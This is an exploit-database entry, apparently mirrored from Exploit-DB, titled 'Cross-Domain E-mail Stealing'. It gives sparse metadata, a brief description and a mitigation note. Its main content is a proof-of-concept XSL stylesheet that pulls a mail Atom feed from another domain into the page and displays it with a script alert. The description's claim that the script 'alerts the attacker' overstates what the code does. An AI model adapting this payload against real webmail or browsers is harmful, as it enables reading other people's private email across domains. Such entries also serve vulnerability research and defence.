header-logo
Suggest Exploit
vendor:
N/A
by:
Anonymous
8.8
CVSS
HIGH
Cross-Domain Scripting
79
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Cross-Domain E-mail Stealing

This exploit allows an attacker to steal e-mail from a different domain by using an XSL stylesheet to inject a malicious script into the page. The script then alerts the attacker with the contents of the page, which includes the e-mail from the other domain.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all XSL stylesheets are properly validated and sanitized before being used in a web application.
Source

Exploit-DB raw data:

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:str="http://exslt.org/strings" extension-element-prefixes="str">
<xsl:template match="*">
<html>
<body>
Below, you should see e-mail stolen cross-domain!
<p/>
<xsl:value-of select="document('https://mail.example.com/mail/feed/atom')"/>
<script>
alert(document.body.innerHTML)
</script>
</body>
</html>
</xsl:template>
</xsl:stylesheet>